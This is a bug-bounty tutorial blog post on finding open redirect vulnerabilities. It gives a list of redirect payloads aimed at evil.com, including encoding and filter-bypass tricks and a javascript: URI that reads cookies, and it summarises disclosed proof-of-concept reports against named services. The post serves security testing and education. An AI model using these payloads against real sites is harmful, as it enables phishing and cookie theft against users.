Day 5 of 30 Days — 30 Vulnerabilities | Open Redirects

Day 5: Mastering Open Redirects — Essential Tricks & Techniques Based on Personal Experience and Valuable POCs

[ In collaboration with Sunil Kumawat (LinkedIn | Twitter)]

Hey geeks, Abhijeet kumawat (Twitter) here with one more write-up on tricks & tips to detect Open Redirect vulnerability.

An Open Redirect vulnerability allows an attacker to redirect users to an untrusted website of the attacker’s choice. This is typically done by manipulating parameters in URLs that the application uses to redirect users. The primary danger lies in phishing attacks, where a user is tricked into visiting a malicious site that appears legitimate due to the trusted domain in the initial URL.

Open Redirect vulnerabilities can be found in various parts of a web application, including:

Login Pages: Redirecting users to their intended destination post-login.Error Pages: Redirecting users to error-specific pages.Parameter Handling: URLs that include redirection parameters for handling post-transaction navigation.Marketing or External Links: Redirecting users to promotional or external websites.

To detect Open Redirect vulnerabilities, follow these steps:

Manual Testing:Identify all points in the application where redirection occurs.Modify the URL parameters to see if the redirection can be manipulated to point to an external domain.

2. Automated Tools:

Use web vulnerability scanners that can detect open redirect vulnerabilities by testing common patterns.

3. Intercepting Proxies:

Utilize tools like Burp Suite to intercept requests and modify redirection parameters in real-time, observing if the application redirects to unintended URLs.

Here are some payload examples ranging from basic to advanced techniques used to exploit Open Redirect vulnerabilities:

http://example.com/redirect?url=http://evil.comhttp://example.com/redirect?next=http://evil.comhttp://example.com/redirect?redirect=http://evil.comURL Encoding: http://example.com/redirect?url=http%3A%2F%2Fevil.comMixed Case Protocols: http://example.com/redirect?url=HtTp://evil.comDouble Slashes: http://example.com/redirect?url=//evil.comUsing @ Symbol: http://example.com/redirect?url=http://trusted.com@evil.comPrefix Manipulation: http://example.com/redirect?url=http://trusted.com.evil.comJavaScript URIs: http://example.com/redirect?url=javascript:alert(document.cookie)

Attackers often use various techniques to bypass defenses put in place to prevent Open Redirect vulnerabilities. Here are some common bypass techniques:

Encoding Variants:Using different encodings (e.g., URL encoding, UTF-8) to bypass simple string checks. For example, %68%74%74%70%3a%2f%2f represents http://.

2. Protocol Manipulation:

Using alternative protocols or variations like HtTp://, //example.com, or https:// to bypass filters that only check for http://.

3. Prefix Manipulation:

Manipulating the URL structure to include a trusted domain as part of the untrusted URL. For instance, http://trusted.com@evil.com might be interpreted by some browsers as pointing to evil.com.

4. Adding False URL Prefixes:

Inserting trusted domain names within the URL to fool basic substring checks. For example, http://trusted.com.evil.com.

Here are detailed Proof of Concept (POC) examples illustrating Open Redirect vulnerabilities and their impacts:

Description: The Omise Dashboard is vulnerable to an Open Redirection flaw if the server receives a crafted X-Forwarded-Host header.

Steps to Reproduce:

Visit https://dashboard.omise.co/signin and sign in with your credentials without verifying your email.After logging in, navigate to https://dashboard.omise.co/test/dashboard.Send the request to Repeater in Burp Suite and add the header X-Forwarded-Host: bing.com below Host: dashboard.omise.co.Open the modified request in the browser and click “here” inside the message prompting email confirmation.You will be redirected to a malicious page.

Impact: An attacker can redirect users to malicious websites, leading to phishing attacks.

Description: MoPub’s login page allows URL redirection using the “next” parameter, which can be manipulated to redirect users to any website, including enabling XSS with JavaScript URIs.

Steps to Reproduce:

Use the URL: https://app.mopub.com/login?next=https://google.com.Change https://google.com to any URL of your choice.Visit the modified URL and log in.You will be redirected to the specified site.

Impact: An attacker could use this for phishing, cookie jacking, and XSS attacks by embedding JavaScript URIs and using URL encoding to obfuscate the malicious URL.

Description: Shopify’s login page is vulnerable to an open redirect using the “checkout_url” parameter after user authentication.

Steps to Reproduce:

Use the URL: http://mystore.myshopify.com/account/login?checkout_url=.np.Visit the link and log in.You will be redirected to https://mystore.myshopify.com.np/, which is not a Shopify domain.

Impact: Users can be redirected to non-Shopify domains, potentially malicious, leading to phishing and other attacks.

Description: The interstitial redirect on HackerOne allows redirection without a stop for warnings, using the “zendesk_session” parameter.

Steps to Reproduce:

Create a custom Zendesk account with a redirect in the header file: <script>document.location.href = "http://evil.com";</script>.Use the URL: https://hackerone.com/zendesk_session?locale_id=1&return_to=https://support.hackerone.com/ping/redirect_to_account?state=company:/.Users clicking on the link are redirected to an untrusted site without any warning.

Impact: Attackers can exploit trusted links to redirect users to malicious sites without warning, leading to potential phishing attacks.

Open Redirect vulnerabilities, while often considered less severe than other vulnerabilities like XSS or SQL injection, still pose significant risks, primarily in phishing and social engineering attacks. It’s crucial for developers to sanitize and validate all user inputs, especially those used in URL redirections. Implementing strict validation, avoiding the use of user-controllable data in redirects, and employing security-focused design patterns can significantly reduce the risk of these vulnerabilities.

Open Redirect Cheat Sheet: https://pentester.land/blog/open-redirect-cheatsheet/
Techniques: https://techbrunch.github.io/patt-mkdocs/Open%20Redirect/
OWASP Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html

If you are still reading & find this blog interesting then do follow me on Medium & LinkedIn for more write-ups

Stay tuned for Day 6, where we’ll dive into another vulnerability!